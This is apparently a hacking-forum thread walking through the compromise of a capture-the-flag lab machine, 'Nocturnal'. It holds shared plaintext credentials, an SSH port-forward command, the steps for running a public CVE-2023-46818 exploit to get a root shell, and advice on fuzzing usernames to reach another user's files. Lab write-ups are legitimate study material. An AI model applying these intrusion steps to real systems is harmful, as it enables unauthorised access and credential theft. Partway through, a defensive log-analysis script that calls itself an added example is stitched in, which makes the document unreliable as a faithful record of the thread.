Posts: 201
Threads: 42
Joined: Nov 2024
(04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Ah man, you already shared it?
I missed it
Mine is almost the same and this one is also working fine, so no need to pay 8 creds for my shared method. Sad life.
Posts: 8
Threads: 1
Joined: Oct 2024
(04-12-2025, 09:16 PM)samuelballsiu1 Wrote:
(04-12-2025, 09:12 PM)hujson Wrote: (04-12-2025, 08:59 PM)samuelballsiu1 Wrote: (04-12-2025, 08:53 PM)hujson Wrote: (04-12-2025, 08:10 PM)maggi Wrote: log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How to download the SQL dump? I'm getting a 403.
Login as amanda:arHkG7HAI68X8s1J
Create backup with the password arHkG7HAI68X8s1J
and unzip with the same password arHkG7HAI68X8s1J
Thanks it worked. But how did you find the creds for that account?
find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account
What wordlist did you use for the bruteforce that has the amanda user in it?
Posts: 27
Threads: 1
Joined: Mar 2025
(04-13-2025, 05:15 AM)RedBlock Wrote: (04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Ah man, you already shared it?
I missed it
Mine is almost the same and this one is also working fine, so no need to pay 8 creds for my shared method. Sad life.
Just remove the 8 credits bro or at least put 1 lol
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Reposting hidden content for free
Posts: 28
Threads: 2
Joined: Apr 2024
(04-12-2025, 08:10 PM)maggi Wrote: (04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but it doesn't make my revshell work, idk why, any suggestions?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
Posts: 4
Threads: 3
Joined: Mar 2025
(04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Thanks man! I really appreciate it.
Posts: 20
Threads: 0
Joined: Dec 2023
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
did not work for me.
needed to reboot box, to get command execution.
Maybe will help someone
Posts: 1
Threads: 0
Joined: Mar 2025
(04-13-2025, 09:48 AM)Liy4 Wrote: (04-12-2025, 08:10 PM)maggi Wrote: (04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but it doesn't make my revshell work, idk why, any suggestions?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
Use burp suite or ZAP (if you don't have pro burp) to fuzz usernames. You can register an account, upload a dummy file. Then you can click on your uploaded file and intercept that request. Then fuzz the username value with a name list. You can sort the response size to find amanda.
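For the defending side of the username fuzzing described in the post above, an added example (not part of the thread) that flags clients requesting many distinct `username` values from `/view.php` within a short window. The combined access-log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Assumed combined log format: ip - - [time] "METHOD target HTTP/x" status size ...
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) ')

def parse(line):
    """Return (ip, time, username) for a /view.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    names = parse_qs(url.query).get("username")
    if not url.path.endswith("/view.php") or not names:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, names[0].lower()

def find_enumerators(lines, max_users=5, window=timedelta(minutes=5)):
    """Map each client IP to its peak count of distinct usernames requested
    inside one sliding window, for clients that exceed max_users."""
    events = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        events[rec[0]].append(rec[1:])
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = len({user for _, user in evs[start:end + 1]})
            if distinct > max_users:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged

# Constructed sample lines (documentation IP ranges, made-up names and sizes).
NAMES = ["admin", "alice", "amanda", "bob", "carol", "dave", "erin", "frank"]
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/Apr/2025:20:01:{i:02d} +0000] '
    f'"GET /view.php?username={n}&file=a.pdf HTTP/1.1" 200 2985'
    for i, n in enumerate(NAMES)
] + [
    '198.51.100.20 - - [12/Apr/2025:20:02:00 +0000] '
    '"GET /view.php?username=carol&file=cv.pdf HTTP/1.1" 200 5120',
    '198.51.100.20 - - [12/Apr/2025:20:03:10 +0000] '
    '"GET /view.php?username=carol&file=notes.odt HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    print(find_enumerators(SAMPLE_LOG))
```

A logged-in user normally reads only their own files, so more than a handful of distinct `username` values from one client is a strong signal; tune `max_users` and `window` to the site's real traffic.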
Posts: 192
Threads: 31
Joined: Apr 2024
(04-13-2025, 09:48 AM)Liy4 Wrote: (04-12-2025, 08:10 PM)maggi Wrote: (04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but it doesn't make my revshell work, idk why, any suggestions?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
fuzzing and a wordlist (ffuf is dank)
Posts: 28
Threads: 0
Joined: Jun 2024
thanks for sharing brother
Posts: 3
Threads: 0
Joined: Apr 2025
(04-12-2025, 11:02 PM)bl4cksku11 Wrote: Easy root:

That's it! Pwned. Enjoy
How did you find out about this vulnerability?